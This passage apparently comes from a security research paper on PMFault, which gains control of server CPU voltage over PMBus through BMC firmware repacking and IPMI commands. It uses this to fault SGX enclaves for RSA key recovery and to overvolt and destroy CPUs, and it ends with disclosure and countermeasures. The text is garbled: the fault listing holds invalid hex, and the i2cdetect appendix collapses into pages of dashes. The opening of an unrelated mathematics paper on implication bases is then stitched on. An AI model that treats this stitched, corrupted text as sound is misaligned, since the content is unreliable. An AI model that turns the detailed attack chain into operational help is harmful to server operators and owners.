voltage. Figure 4: Layout of the BMC firmware upgrade package. The NVRAM region stores the current configuration of the BMC, the rootFS is a LZMA-compressed cramFS file system with only its header encrypted. The kernel region stores a Linux kernel image, while the BMC website FS is another compressed file system with only the file system header encrypted. The FW Footer starts with a magic value ATEN_FW and contain information about the firmware version, checksum, etc. The FW Table is an encrypted region and stores a table of the image layout. All encrypted region of the firmware can be decrypted with a key extracted from _ipmi.so_ on the _rootFS_. Figure 5: Setup of the E3-1220V6-X11SSL-CF for practical experiments. These connections are for experiments only; physical access is not required in the actual attack. Discovering the VRM AddressFinding the I2C address of the VRM is the first step of PMFault. The easiest way to explore the I2C buses is to use the interface provided by the OS. There are two I2C buses that can be used from the OS running on the CPU: i2c-0 is shown by default, while i2c-1 requires the i2c_i801 kernel module to be loaded. To find all available devices on both I2C buses, we ran the i2cdetect tool on them. We found that there are 12 devices in total connected to the I2C bus. The full list of device addresses can be found in Appendix A. To then determine which device is a VRM, we use the result of the standard PMBus command, READ_VOUT, as an indicator. The Plundervolt [MOG\({}^{+}\)20] attack showed that the normal operating voltage of the CPU should be greater than 0.55 V, thus, if the voltage read by READ_VOUT is within this range, it may be a VRM. Of the 12 devices detected, only one device with address 0x20 on I2C bus 1 responded with a value in this voltage range. We hence suspect this device is the VRM. To verify the result, we also used MFR_ADDR_PMBUS (0xE1) command found in the MP2965 datasheet [Mon] to read the PMBus address of the device. The result is 0x20, which confirms our finding. Changing CPU Voltage with PMBus CommandsHaving identified the VRM, one can next attempt to send commands to change the CPU voltage. In the datasheet of the MP2965 [Mon], we found an "overclocking" procedure that can be used for this purpose. There are two overclocking modes, _tracking mode_ and _fix mode_. In PMFault, we mainly use the fix mode to set a defined voltage. In the fix overclocking mode, the VRM uses the VID configured with the PMBus command VOUT_COMMAND and ignores the configuration from the SVID bus. Figure 6 shows the steps of using this mode to change voltage. First, we need to configure two registers: The first one is VOUT_OPERATION; by setting the first bit of this register, we enable PMBus override mode. We also have to set bit 3 of MFR_VR_CONFIG to make the VRM act on these changes. After this, the voltage supplied to the CPU will be changed according to the configuration in VOUT_COMMAND. To send this PMBus command sequence and change the CPU voltage, we wrote a PoC with the libi2c. This PoC can be compiled and run under Linux. "Stalls" caused by PMBus CommandsThe experiments in Section 4.1 also show that the VRM responds to the PMBus commands sent from the CPU. One may thus assume that it would then be straightforward to directly send PMBus commands to change the CPU voltage with this method. However, we found that the CPU stalls after sending the MFR_VR_CONFIG command to actually configure the VRM to use the new voltage. This will make the CPU voltage being kept at the changed value with no way to change it back. This phenomenon raised two questions: Is the CPU stall caused by a crash or a recoverable halt? If it is caused by a recoverable halt, will this protect against targeted undervolting fault injection? To answer this, we connected a Raspberry Pi to the PMBus to directly control the VRM. The I2C interface to the VRM is exposed with two pins, SDA and SCL. As shown in Figure 5, we connected the I2C interface of the Raspberry Pi to these pins. In the first experiment, we sent a command to disable overclocking after the stall happens. It appears that with the VRM reconfigured to normal mode, the CPU recovers from the stall situation if the undervolting value is not too low. This shows that the stall is Figure 6: Command sequence to change the voltage via PMBus. caused by a recoverable halt and not a crash. The second experiment is used to find out if the halt will prevent the fault from happening. In this experiment, we used the CRT-RSA PoC of the Plundervolt attack. With the CPU running this PoC, we used Raspberry Pi to send PMBus commands to produce voltage glitches. We found that with glitches with gradually lower voltage, an exploitable fault happens with the CRT-RSA calculation. Hence, in summary, the "stall" phenomenon will prevent the PMBus attack from being conducted by the CPU-VRM I2C interface, but it does not prevent the fault caused by undervolting from having an impact on CPU calculations. Voltage Control with BMCBecause our attempt of voltage glitching failed with the PoC running on the CPU, we started to look into the BMC-VRM I2C interface. In the BMC firmware dumped in Section 3.1, we found the i2c.ko kernel module, which provides a driver for the I2C interface. However, this module does not implement a standard ioctl() for I2C devices, which is required for using libi2c. This means that the above PoC, which uses this standard I2C library, cannot be used to communicate with this kernel module. As the kernel module in the firmware did not implement the standard I2C API, we had to find another way to utilize the BMC's I2C interface. With the help of the I2C driver in the latest Linux kernel [astb, asta], we found that there are 14 I2C interfaces on the AST2400 BMC controller. Each has a set of memory-mapped registers to control the interface. We also found the setup and message sending/receiving sequence of the I2C interface. We then created a small library to directly write these registers and send I2C bus commands from the BMC CPU to the address of the VRM. By monitoring the I2C activity with an oscilloscope (this was only required for debugging and during development), we found that the I2C bus 2 (counted from bus 0) of the BMC has the VRM connected. ### Enabling SSH Access and Firmware Repacking Modification of the firmware can be used to obtain a root shell on the BMC. With the "Supermicro BMC firmware image decryptor" [10] and a modified version of the "ipmi firmware tool" [10] with added support for X11 images, we were able to extract the firmware encryption key and decrypt the file system header. With these, we can unpack and modify the full root file system. As described in Section 3.2, /SMASH/msh provides the shell for SSH service. To enable full root shell access, we replaced this file with a shell script with a single line to execute /bin/sh. Besides, as the SSH service is running with root privileges, with the shell redirected to sh, we could obtain a root shell once connected to the SSH. To repack the image, we modified the "Supermicro BMC firmware image decryptor" tool to add firmware encryption support and constructed a firmware package with a valid footer and firmware table. We successfully tested and installed this modified firmware package both with the web firmware upgrade interface and the IPMI firmware upgrade interface via the AlUpdate tool. ### Attack Chains for PMBus Access In this section, we discuss three possible attack chains to take over the PMBus with the techniques shown in the previous sections. The attacker can use any of these attack chains and change the CPU voltage to perform PMFault attacks, _i.e._, to over/undervolt the CPU. Remote BMC Firmware UpgradeThe first attack chain assumes a malicious insider threat model. This attack chain makes use of the web or IPMI interface through the BMC Ethernet connection. To use this interface, the attacker needs to have access to the BMC management Ethernet port or the shared management Ethernet port eth0 on the system. Besides, the attacker needs to obtain valid credentials to login to the BMC. In detail, the attacker can first use the method described in Section 4.2 to repack the SMT_X11_163 firmware upgrade package from [bmc] to enable SSH root access to the BMC. Then, they can upload the firmware with the web management interface or the IPMI management interface over Ethernet. With the SSH interface enabled, the attacker can cross-compile the voltage-changing PoC described in Section 4.1 for the BMC, and then upload and execute it to send PMBus commands. We used base64 -d > /tmp/i2c-pmbus-send to upload our exploit code due to the unavailability of the SCP service on the BMC OS. Local BMC Firmware UpgradeSimilar to the first, this attack chain also involves a firmware upgrade for code execution on the BMC. However, we use the KCS interface discussed in Section 3.3 to upgrade the firmware. The attacker does not require access to the management Ethernet plane, instead, only root privileges on the OS running on the CPU is required. This is e.g., relevant for data centers that host bare metal machines for customers or for malware/ransomware that has obtained root through other exploits. IPMI InterfaceThe third attack chain uses the IPMI I2C functionality. An attacker with root access on the CPU OS or access to the management port of the BMC can use this interface to send commands to any I2C device that is connected to the BMC. The command used for sending the raw I2C packets is shown in Listing 1. The I2C mapping of this interface is the same as found during the initial investigation in Section 4.1. The VRM is at address 0x20 on bus 2. However, since the last bit of the first packet of I2C indicates the type of operation (read or write), we need to shift the device address left by one bit and set the last bit accordingly when using this interface to control PMBus. ipmitool i2c bus=2 0x40 <PMBus Command> <PMBus Data> ``` 1:IPMI command for sending I2C packets. ``` Listing 1: IPMI command for sending I2C packets. ## 5 Undervolting and Overvolting Attacks In this section, we show how under/overvolting through the PMBus leads to attacks on SGX and also permanent physical damage to the CPU. The attack requires any flaw that gives a software attacker access to the PMBus. As mentioned in Section 4.3, this can e.g., be a malicious firmware upgrade or the use of the IPMI-to-I2C functionality. The attack is generic in the sense that _various_ flaws can lead to the same outcome: remote fault injection attacks on SGX and bricking the CPU. Figure 7 shows an overview of the attacks. ### Undervolting Attack against Intel SGX Adversary ModelAs mentioned in Section 1.2, we assume a threat model where an attacker (including a malicious insider) has full software access to the system but no (or limited) physical access. More precisely, the attacker has root access to the OS and software access to the BMC via the KCS interface or Ethernet. All attack chains described in Section 4.3 can generally be used under this threat model. It is worth mentioning that the attack that uses ipmitool through the KCS interface does not require knowledge of the BMC credentials. A privileged local user on a compromised host CPU can thus use ipmitool to inject fault into SGX purely from software. Proof of ConceptWe used the same PoC code as Plundervolt/VoltPillager [30]. Before injecting the voltage glitch, we use the attack chain described in Section 4.3 to gain control of the PMBus. To start with, we used the multiply operation as the first target, as it is a simple target to fault. By gradually lowering the CPU voltage with the PMBus commands sent by the BMC while running the Plundervolt/VoltPillager PoC on the CPU, we successfully injected faults into the multiply operation (in our experiments at voltage \(0.845\,\mathrm{V}\) with the CPU running at \(2\,\mathrm{GHz}\). To verify the fault injection also works for encryption operations running in SGX, we ran the CRT-RSA signature PoC from Plundervolt/VoltPillager, with an RSA signature computed inside an enclave using the Intel Integrated Performance Primitives (Intel IPP) cryptography library functions [Cor]. Again, we could obtain faulty signatures as shown in Listing 2. Furthermore, we confirmed that these faulty values could be used to factor the RSA modulus and recover the private RSA key using the Lenstra attack [1]. ``` //Faultyclalculation1 0x3f,0x0,0x8,0x74,0x04,0x18,0x9c,0xcd,0x91,0x1a,0x02,0x12,0x2a,0x2a,0x5a,0x89,0x8,0x32,0x00,0xde,0x05,0x15,0x53,0x72,0x84,0x00,0x0d3,0x67,0xbe,0x21,0x22,0x40,0x76,0xbc,0x8c,0x8d,0x8f,0x0,0x0,0x47,0x9c,0xbe,0xbc,0x66,0x7,0x7e,0xbc,0x4b,0x4c,0x4b,0x4c,0x4d,0x4b,0x4d,0x4b,0x4d,0x4b,0x4d,0x4e,0x4f9,0xcd,0x5,0x6a,0x8d,0x3b,0x1,0x35,0x769,0xcd,0x50,0x50,0x5a,0x4a,0x10,0x52,0x44,0x6c,0x20,0x5b,0x5b,0xde,0x4e,0x4d,0x61,0x8e,007,0x84,0x4d,0x5a,0x77,0xf7d,0x0d,0x8f,0x0,0x4d,0x4e,0x5b,0x6f,0x6b,0x6c,0x73,0x0b,0x8g,0x69,0x68,0x79,0x8g,0x69,0x69,0x78,0x91,0x92,0x10,0x11,0x20,0x12,0x13,0x14,0x2e,0x24,0x25,0x14,0x26,0x14,0x27,0x27,0x28,0x8d,0x5b,0x40,0x92,0x5a,0x31,0x40,0x7e,0x94,0x5b,0x40d,0xce,0x75,0x4a,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,1...zeroesleftout...] Incorrect result! ``` Listing 2: Faulty CRT-RSA decryptions/signatures generated by the respective ipps functions. Reproducibility of CRT-RSA Fault InjectionTo further evaluate the reproducibility of the attack, we setup an automated testing environment by connecting a Raspberry Pi to an Ethernet port (eth0) and the power button of the motherboard. We ran a Python script to repeat the following steps numerous times: 1. [noitemsep,topsep=0pt,parsep=0pt,leftmargin=*] 2. Upload the exploit for controlling the CPU voltage to BMC via an SSH connection. Figure 7: Overview of the PMFAULT attack. With root access to the OS or access to the BMC via Ethernet or KCS, the attacker can perform a malicious firmware upgrade of the BMC and then takeover the PMBus. The attacker can also use the ipmi i2c command to directly control the PMBus via BMC. With control over the CPU voltage, the attacker can overvolt to brick the CPU or undervolt to inject faults into SGX. 2. SSH into the OS running on the host CPU and trigger CRT-RSA signing in an SGX enclave. 3. Run the PMFault exploit on the BMC to gradually lower the CPU voltage while the signature is computed in the SGX enclave. 4. Stop lowering the CPU voltage when a fault occurs. 5. Record the result and cleanup. 6. If no faulty result is output, the system may have crashed due to too low voltage. In this case, we use the connection to the motherboard power button to reboot the system and wait to allow the system to boot into a stable status. In total, we conducted 253 tests within 545 min. Of those, faults occurred in 194 tests. 66 of these faulty results could be used to successfully recover the correct RSA private key using the Lenstra attack, which translates to a success rate of 26%. On average, a useful fault could be obtained within 9 minutes. ### Overvolting to Permanently Brick a CPU Apart from the undervolting attack to extract keys from an SGX enclave, we also discovered another attack, which is an overvolting attack that can permanently destroy the CPU. Adversary ModelIn this attack, as described in Section 1.2, we assume an attacker who has root privilege on the host CPU. For example, this could be in the case that an attacker has placed ransomware on a system and threatens to damage the CPU unless a ransom is paid. Clearly, root should have full control of all software running on the CPU, but _should not_ be able to cause any physical damage to the system. The attack chain described in Section 4.3 using ipmitool with KCS can be used within this threat model. Proof of ConceptTo overvolt the CPU, we firstly configure the MFR_VR_CONFIG register of the VRM to use the 10 mV SVID table. This allows changing the CPU voltage up to 3 V. We also disabled the over-current protection by reconfiguring the MFR_OCP_TOTAL_SET register. Then we used the voltage changing procedure to change the CPU voltage to a value much higher than the normal operating voltage. We found that this procedure allows changing the CPU voltage up to \(\sim\)2.84 V for \(\sim\)1 ms, which is outside the typical operating range of Intel CPUs. By increasing the voltage beyond the specified operating voltage range (0.55 V-1.52 V) [11] of a 7th Gen Intel E3-1220V6 CPU two times, we permanently destroyed the CPU and left the system in an unbootable state within a few seconds. We successfully repeated the experiment with a second, identical CPU. An example of overvolting is shown in Figure 8. For environmental and financial reasons, we were satisfied after successfully destroying two CPUs and decided to not perform further experiments in that regard. ## 6 Evaluation of other Server Motherboards As we found the PMBus to be a common interface present on server motherboard, we decided to investigate other manufacturers as well. To facilitate larger-scale testing of this, we wrote a tool called PMBusDetect. With this tool, we scan the system for a PMBus connection and try to detect the VRM address. We applied this tool to several other systems, including an ASRock rack motherboard (ASRock E3C246D4I-2T) and a Supermicro X12DPi-NT6 motherboard (kindly provided by Supermicro for testing). We then conducted further analysis of these systems to check if they are vulnerable to any PMBus-related attack. PMBusDetect Tool for VRM DetectionBased on the VRM detection process mentioned in Section 4.1, we built the PMBusDetect tool to automatically scan all addresses of a specified I2C bus for VRMs. During testing, we found that the implementation of PMBus and usage of the VRM is different between motherboard, and the most stable command to identify a VRM is READ_TEMPERATURE (0x8d). We use the response to this command as an initial indicator to identify whether a VRM is present, and then use the VRM detection process from Section 4.1 to verify the result. Moreover, as the capabilities and voltage changing sequence can differ between VRM vendor, we added an additional procedure to detect the vendor of the VRM. For this, we use the result of reading ISL_DEVICE_ID (0xad) as an indicator for Intersil VRMs and SVID_VENDOR_PRODUCT_ID (0xbf) for MPS, respectively. Detection based on ipmi i2c is also implemented for detecting the connection between VRM and the BMC as mentioned in Section 4.3. An example output of PMBusDetect with Supermicro X11SSL-CF is shown in Appendix B, while Table 3 shows a summary of the motherboard tested and the scan result for VRMs with PMBusDetect. We are aware that our testing--restricted by (lack of) access to server hardware-- only gives a very limited picture of the use of PMBus and VRMs on server hardware. We hence decided to open-source PMBusDetect and build on community efforts in the future to obtain a better view of the PMBus landscape. ### ASRock Power-Down Attack The ASRock E3C246D4I-2T motherboard uses an Intel Xeon E-2124 CPU with an Intel C246 Chipset and ASPEED AST2500 BMC with login credentials defaulting to ADMIN:ADMIN. We used the PMBusDetect tool together with manual probing and found that the VRM of this motherboard is connected to both the BMC and I2C bus of the CPU. In the following attack, we assume that the attacker is a user on a baremetal server with root access in the OS. The VRM used on this motherboard is an ISL69138. Because it is made by a different \begin{table} \begin{tabular}{c c c c c} \hline \hline Name & BMC & Chipset & VRM Address & PMBus Connects to \\ \hline Supermicro X11SSL-CF & AST2400 & C232 & 0x20 & BMC \& CPU \\ Supermicro X12DPi-NT6 & AST2600 & C621A & 0x30 \& 0x34 & — \\ ASRock E3C246D4I-2T & AST2500 & C246 & 0x60 & BMC \& CPU \\ \hline \hline \end{tabular} \end{table} Table 3: Tested motherboards and their VRM detection result. Figure 8: Oscilloscope capture of voltage change during overvolting, VOUT_COMMAND set to OxFF (with 10 mV VID table). Yellow: PMBus clock, blue: \(V_{cpu}\). \(V_{cpu}\) shoots up to 2.84 V during overvolting. manufacture compared to the MP2955, the voltage changing PMBus command sequence used for the MP2955 does not work with this VRM. Due to lack of documentation of this procedure, we at the moment could not precisely overvolt or undervolt the CPU via the PMBus. Yet, we discovered a new attack to disable the VRM and force power-down the CPU, leaving the system in a (temporary) inoperable state. PMBusDetect shows that the VRM is at address 0x60 on I2C bus 2 of the host CPU. Different to the findings for the Supermicro X11SSL-CF, this VRM uses PMBus registers on page 0x1 instead of the default 0x0. We then issue the ON_OFF_CONFIG (0x02) and OPERATION (0x01) commands: We configure the OPERATION to "Immediate Off" and set the "source of enable" only to ON_OFF_CONFIG. This results in a immediate power-off of the VRM and crashes the system. During testing, we found the PMBus is only writable from the CPU with IPMI over KCS interface, but not from the BMC with ipmi i2c commands. As the result, it is not possible for the administrator of the system to remotely configure the VRM back to a normal state. Simply issuing the ipmi powercycle command with IPMI over LAN will leave the system in a infinite boot loop. To recover from this attack, the administrator has to physically power-cycle the system, which might increase downtime in a Denial-of-Service (DoS) scenario. This shows that PMBus as an attack vector does not only affect Supermicro X11SSL-CF, but also can have impact on servers from other manufacturers. Besides we believe that it might also be possible to conduct CPU bricking attacks if the PMBus voltage changing sequence of Intersil VRM is known. We leave this for future work. ### Other Supermicro X11 Motherboards We also ran the PMBusDetect tool on X11SPG-TF and X11SSE-F Supermicro server motherboards--in both cases, the VRM was reachable in the default configuration. To test if they are vulnerable to PMFault, we sent PMBus commands through ipmi i2c commands and successfully undervolted them to crash the system. This shows that the attack chain through the IPMI interface is valid on these systems. As the systems were provided by a third party for remote testing, we were not able to attempt overvolting and similar, destructive experiments, but believe these motherboards to be equally affected. ### Supermicro X12 Motherboards We disclosed the vulnerability to Supermicro in May 2022. They confirmed the issue and also provided a X12 generation Server for further testing. This system, Supermicro X12DPi-NT6, features a dual Intel Xeon Gold 6330 CPU, Intel C621A Chipset, and AST2600 BMC. Our investigation shows that mitigations has already been implemented on this motherboard to break the attack chain of PMFault before we reported the attack to Supermicro. Firstly, the firmware upgrade package is properly signed with RSA and verified during the firmware upgrade process, which prevents malicious firmware uploads to the BMC via IPMI. This breaks the attack chain though firmware upgrade. Secondly, I2C packet filtering has been implemented in the BMC, which prevents IPMI commands to directly send packets to the PMBus. Moreover, our PMBusDetect tool shows that the VR is not connected to the CPU, which prevents an attack directly from the operating system. In conclusion, to the best of our knowledge, we believe that Supermicro X12DPi-NT6 is not directly vulnerable to the attacks described in this paper. However, we note that as-of-yet unknown vulnerabilities might remain in the firmware update process and the complex software stack running on the BMC, which warrants further investigation. ## 7 Conclusions and Countermeasures In this paper, we demonstrated two remote attacks that use the PMBus interface to control the CPU voltage. An undervolting attack can be used to inject fault to the SGX enclave of the CPU and e.g., recover a secret key used in cryptography algorithms. The overvolting attack causes permanent damage to the CPU. The attack affects, to our knowledge, all 11th generation Supermicro systems. It also impacts ASRock (tested with ASRock E3C246D4I-2T), though as described the VRM behaves differently to Supermicro. We suspect that the attack might also affect other vendors (given that BMCs are often similar), but could not further investigate this and thus leave it for future work. ### Server Platform Security and Embedded System Security We first discuss the security considerations for server platforms. Previous security research on computer platforms were mainly focused on the security of the software (either running on the CPU or the management controller). However, each subsystem on a server platform does not act in isolation. Instead, they may interact with each other via the physical connections on the motherboard. In our attacks, we show that the hardware design of the system with a correctly implemented ipmitool can lead to severe security issues and damage to the system. Apart from the components on the motherboard, one should also take "plugin" devices into consideration when analysing the security of server platforms. During our investigation of the system, we found that when a Peripheral Component Interconnect Express (PCI-E) device is plugged onto the motherboard, it is also connected to the I2C bus of the motherboard. However, if the firmware of a PCI-E device is compromised, it can gain access to the PMBus to perform the same attacks described in this paper. On E3-1220V6-X11SSL-CF, this connection can be configured with a jumper named JI2C. Although this jumper is disconnected by default, the user may not be aware of the security implications of connecting this jumper. In summary, the server platform is a system that has multiple components and microcontrollers. The security of the platforms is not only down to ensuring the security of the software running on it, but the overall design of the hardware and embedded systems on the motherboard should also go through a thorough security review. Securing such a system needs collaborative effort of both software developers and hardware engineers. ### SGX Security Our attack on SGX enclaves shows that a privileged local attacker can inject a fault to the enclave and recover secret information with the server management interface, effectively reviving Plundervolt-like software undervolting attacks on Supermicro X11 motherboards. We also demonstrate that a malicious service provider (e.g., cloud hoster) can use the attack chains described in the paper to break the security guarantee provided by SGX. Moreover, the vulnerability currently cannot be detected/mitigated by SGX attestation, because the BMC and its firmware are not within the scope of SGX attestation. A supply chain attack is also possible: as the firmware is not securely verified, it is possible for a third party to implant malware into the BMC and later launch remote attacks on SGX and/or damage the CPU. Such a firmware modification is also conceivable while the device is being shipped to the end user. Detecting such attack would be hard, as the firmware of the BMC is stored in a separate flash chip. The software running on the BMC is thus usually out-of-scope of traditional malware detection methods. ### Countermeasures Overvolting AttackAccording to our experiments, PMBus-based overvolting can lead to permanent damage to the CPU and thus permanent DoS of the system. The fundamental issue that leads to this attack is the lack of a hardcoded voltage limit of the VRM. Simply adding signature verification of the BMC firmware or using secure boot to break the attack chain might not be sufficient to prevent overvolting, as other, future attacks might also yield PMBus access. Besides, configuring software-based PMBus read/write limitations of the VRM through the MFR_PWD_USER command is also insufficient to stop the attack. This is because this features only sets a 16-bit passcode, which is prone to brute force attack. We suggest the following mitigations be implemented for this attack to break the attack chain: 1. In the short term, the user manual of the relevant system(s) should be updated to describe the usage and suggested configuration of the SMBDAT_VRM and SMBCLK_VRM jumpers, if they are present on a specific model. 2. In the long term, an alternative VRM with a hardwired voltage safety limit should be used to replace the current VRM. 3. Another mitigation would be implementing an I2C filter to detect and block malicious PMBus packets. MFR_VR_CONFIG, which can be used to set a 10mV VID table, is one of the main commands that need to be blocked. Optionally, other commands that involved in the overclocking procedure could be blocked, however, this may affect users who actually want to use this feature. Such a filter could be implemented in a small microcontroller that listens to the I2C bus and "jams" malicious commands by actively pulling the bus low once the command has been detected but before its transmission has been completed. PMBus-based SGX UndervoltingTo the best of our knowledge, PMFault represents the first attack that directly breaches integrity guarantees in the Intel SGX security architecture through the PMBus interface. We believe that the fix currently deployed by Intel against Plundervolt/VoltPwn (CVE-2019-11157)--disabling the SVID undervolting interface--is insufficient when a remote attacker can get access to the PMBus through the BMC or I2C interface of the CPU, as is the case for Supermicro X11 motherboards. We note that there might be many other devices connected to the bus, including PCI-E devices like graphic cards. It is thus also possible for a compromised PCI-E device to send malicious commands to control the CPU voltage. Given the potential impact of our findings regarding fault injection into SGX enclaves, in the short term, we recommend inserting software-based fault injection countermeasures into cryptographic computations in enclaves (e.g., the quoting enclave). However, we note that such fixes can only serve as mitigations, but not fully eliminate this attack vector. We would like to highlight that in our opinion, this attack surface _cannot_ be easily addressed by jumpers to disconnect the VRM from the SMBus or adding signature verification of the BMC firmware, as we believe that SGX attestation cannot independently verify the relevant system configurations: 1. The existence of a PMBus/SMBus interface to the VRM and whether it can be controlled through the I2C interface of the CPU; 2. The existence of an external microcontroller on the motherboard and if it has the functionality to control the VRM (e.g., BMC or other PCI-E devices); 3. The firmware security status of the BMC and other devices on the PMBus. This will make it impossible to give SGX assurance of the trust status of the system. We believe that in the long term, appropriate hardware countermeasures _inside_ the CPU package is required: this could on the one hand include continuous monitoring of the received supply voltage, as recently presented by Intel for critical parts of their systems [17], and on the other the use of fully-integrated voltage regulators. ## Acknowledgements This research is partially funded by the Engineering and Physical Sciences Research Council (EPSRC) under grants EP/R012598/1, EP/R008000/1, and EP/V000454/1. The results feed into DsbDtech. We would also like to thank Supermicro for providing a X12DPi-NT6 server for further investigation of the issue. ## Appendix A i2cdetect Result for Supermicro X11SSL-CF -$ sudo i2cdetect 0 [00-20]: -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- ---- -- -- -- -- -- -- -- -- -- -- -- ---- -- -- -- -- ---- -- -- ------
2304.06837
Independence of Essential Sets in Finite Implication Bases
A new characterization is given to describe implication bases of a closure system in terms of the system's quasi-closed sets. Using this characterization, it is possible to show that groups of implications corresponding to distinct essential sets are interchangeable across different bases. It follows from this result that the sum of cardinalities of right sides of all implications corresponding to a single essential set in an optimal basis is fixed, solving an open conjecture by K. Adaricheva and J.B. Nation in 2014. These results provider greater insight into the global structure of implication bases.
Todd Bichoupan
2023-04-13T22:01:20Z
http://arxiv.org/abs/2304.06837v2
# Independence of essential sets in finite implication bases ###### Abstract. A new characterization is given to describe implication bases of a closure system in terms of the system's quasi-closed sets. Using this characterization, it is possible to show that groups of implications corresponding to distinct essential sets are interchangeable across different bases. It follows from this result that the sum of cardinalities of right sides of all implications corresponding to a single essential set in an optimal basis is fixed, solving an open conjecture by K. Adaricheva and J.B. Nation in 2014. These results provider greater insight into the global structure of implication bases. Definitions and notational conventions are borrowed from [2]. A _closure system_\(\langle X,\phi\rangle\) is a nonempty set \(X\) equipped with a _closure operator_\(\phi:\mathcal{P}(X)\mapsto\mathcal{P}(X)\) that satisfies the following for all \(A,B\subseteq X\): * \(A\subseteq\phi(A)\) * \(A\subseteq B\implies\phi(A)\subseteq\phi(B)\) * \(\phi(\phi(A))=\phi(A)\) A set \(A\subseteq X\) is _closed_ if \(A=\phi(A)\). \(X\) itself is closed, and any intersection of closed sets is closed. The family of closed sets associated with a closure system is unique in the sense that any two distinct closure operators on a set \(X\) generate distinct families of closed sets. Moreover, any family of subsets of \(X\) that is closed under set intersection and contains \(X\) is the family of closed sets associated with some closure operator. An _implication_ on a nonempty set \(X\) is an ordered pair of sets \(A,B\subseteq X\) denoted \(A\to B\). A set \(S\subseteq X\) obeys an implication \(A\to B\) if \(A\not\subseteq S\) or \(B\subseteq S\). For any set \(\Sigma\) of implications on \(X\), the family of sets that obey all implications in \(\Sigma\) form a closure system, \(\langle X,\phi\rangle\), and \(\Sigma\) is said to be an _implication basis_ for \(\langle X,\phi\rangle\). If \(\langle X,\phi\rangle\) is a closure system and \(F\) is the associated family of closed sets, then a set \(Q\subseteq X\) is _quasi-closed_ if \(Q\not\in F\) and \(F\cup\{Q\}\) is still closed under set intersection (i.e., for every \(S\in F\), \(S\supseteq Q\) or \(S\cap Q\in F\)). For any quasi-closed set \(Q\), the closure \(\phi(Q)\) is called an _essential set_. If \(\mathcal{Q}\) is the family of all quasi-closed sets associated with \(\langle X,\phi\rangle\), then \(F\cup\mathcal{Q}\) turns out to be closed under set intersection and has an associated closure operator, \(\sigma\); \(\sigma\) is called the _saturation operator_ associated with \(\langle X,\phi\rangle\). A _quasi-closed_ set \(Q\) associated with a closure system \(\langle X,\phi\rangle\) is called a _critical set_ if there is no quasi-closed set \(S\subsetneq Q\) such that \(\phi(S)=\phi(Q)\). In [3], J.L. Guigues and V. Duquenne showed that if \(X\) is finite, the set of implications \(\{C\rightarrow\phi(C):C\text{ is critical}\}\) is an implication basis for \(\langle X,\phi\rangle\). Guigues and Duquenne showed further that if \(\Sigma\) is an implication basis for \(\langle X,\phi\rangle\), where \(X\) is finite, and \(\sigma\) is the saturation operator associated with \(\langle X,\phi\rangle\), then for every critical set \(C\) there must be an implication \(A\to B\) in \(\Sigma\) such that \(\sigma(A)=C\). In particular, \(\phi(A)\) is an essential set. A stronger characterization of the implication bases associated with a closure system is given. In particular, it is possible to more precisely describes the right sides of implications in a basis. This characterization can be used to show that groups of implications corresponding to distinct essential sets are independent, in the sense that those groups of implications can be combined arbitrarily to form a valid basis. This result resolves a Conjecture 67 of [1] about the right sides of _optimal bases_ - implication bases where the sum of all cardinalities of the left and right sides of all implications is minimal. The following lemma is equivalent to Proposition 19 of [2]. **Lemma 1**.: _Let \(X\) be a finite set and let \(\langle X,\phi_{1}\rangle\) and \(\langle 